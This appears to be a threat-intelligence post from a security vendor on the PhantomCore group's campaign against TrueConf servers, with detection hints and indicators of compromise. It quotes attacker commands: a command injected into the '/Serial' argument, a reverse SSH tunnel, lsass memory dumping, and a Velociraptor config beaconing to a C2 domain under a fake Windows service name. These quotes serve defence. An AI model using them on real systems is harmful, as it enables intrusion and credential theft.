Operation CyberPosi 🤔

More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…
Operation CyberPosi 🤔
The PT ESC IR team, together with the Threat Intelligence team, is observing a new campaign by the APT group PhantomCore, in which the attackers are mass-compromising companies through a chain of vulnerabilities (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) in the TrueConf video conferencing service.
Information about the vulnerabilities in the service was published in August in the FSTEC BDU, and update recommendations were also released. RED Security specialists previously reported the exploitation of these vulnerabilities in their article.
👀 Example of command execution after exploitation under the process name tc_server.exe:
cmd.exe /s /c "C:\\Program Files\\TrueConf Server\\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||whoami|| /File:"C:\\TrueConf\\activation\\offlinereg.vrg"Code language: plaintext (plaintext)
Example of a log event for detecting compromise:
error: the required argument for option '--Serial' is missingCode language: YAML (yaml)
After gaining access to the infrastructure, the attackers act quite selectively and use various techniques to disguise their activity as the actions of information security specialists.
After that, the attackers develop the attack within the network and move laterally through the infrastructure using the remote management protocols WinRM and RDP. The use of WinRM can be monitored in Windows events, as well as in the registry:
Microsoft\Windows\CurrentVersion\WSMAN\SafeClientList\WSManSafeClientListCode language: plaintext (plaintext)
To develop the attack and gain access to privileged accounts, the threat actors obtained a dump of the lsass process, using tools such as:
• DFIR utility for creating a memory dump DumpIt (DumpIt.exe /O dump.dmp)
• file system library Dokan
• utility for analyzing memory dumps MemProcFS (memprocfs.exe -device dump.dmp / M:\name\lsass.exe-123\minidump)
On hosts, the attackers established persistence using primarily a number of their own tools:
• HeartDoor
• MacTunnelRAT (designed to create a reverse SSH tunnel)
• PhantomSscp (designed to create a reverse SSH tunnel)
• OpenSSH (ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 [REDACTED]@[REDACTED])
• Velociraptor
We pay particular attention to the installation of the Velociraptor, utility, which, as a rule, is used by specialists during information security incident investigations, and by attackers — for remote control. Solar 4RAYS specialists previously reported the use of the DFIR tool by attackers.
Example configuration:
version:
name: velociraptor
version: 0.74.2
commit: 121178eb6
build_time: "2025-04-20T01:04:04Z"
...
Client:
server_urls:
- https://telecom-connect.online/
windows_installer:
service_name: WindowsSecurityAgentSvc
install_path: C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
service_description: Windows Security Agent Service
...Code language: YAML (yaml)
🐾 Paths
c:\Windows\ime\ssh.msi
c:\Windows\ime\k.msi
C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css
C:\Program Files\TrueConf Server\httpconf\site\public\rx.exe
C:\Program Files\TrueConf Server\httpconf\site\public\ws.dll
C:\TrueConf\activation\offlinereg.vrg
C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
C:\Windows\System32\dfxhost.dll
Check-Update.xml
Check-Update.ps1
Create-Check-Update-Task.ps1
🧑💻 IoCs
HeartDoor
8f2f31aaa46920efdfa622b52cd8cd53
fde9563317a0c0249447b123b2137b0e
185.189.12.166
PhantomSscp
e5b540f47ec1707fcd9980ab426be115
4b2ce3df0bae02806a72139b5d9e9a55
486faa9e2efbf78d4c03ba5dfe72eb1d
99ef13d85d2b45cb24a86f1e9923d63a
reserve-safe.online
online-channel.online
infonixsecurity.online
xbox-updater.online
MacTunnelRAT
a346f2145bb7b3cce7c8c8c4d88d4678
c549a2e6533e73ea39bfa466e5e6dcd8
ad64f8c8469c87ed0c395c8936550af6
cyberposi.space
nexaguard.space
solution-itspace.online
moscow-tv.online
analytisec.space
safebloom.space
cloud-update.online
shieldify.online
optivault.space
brightshield.space
trustbeam.space
188.127.227.46
Velociraptor
d91f8fb7ee4ec98bd80bad69d7667842
telecom-connect.online
Stage Hub
31.57.93.105
SSH Tunnel Control Panel
77.73.39.120
191.101.184.123
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…






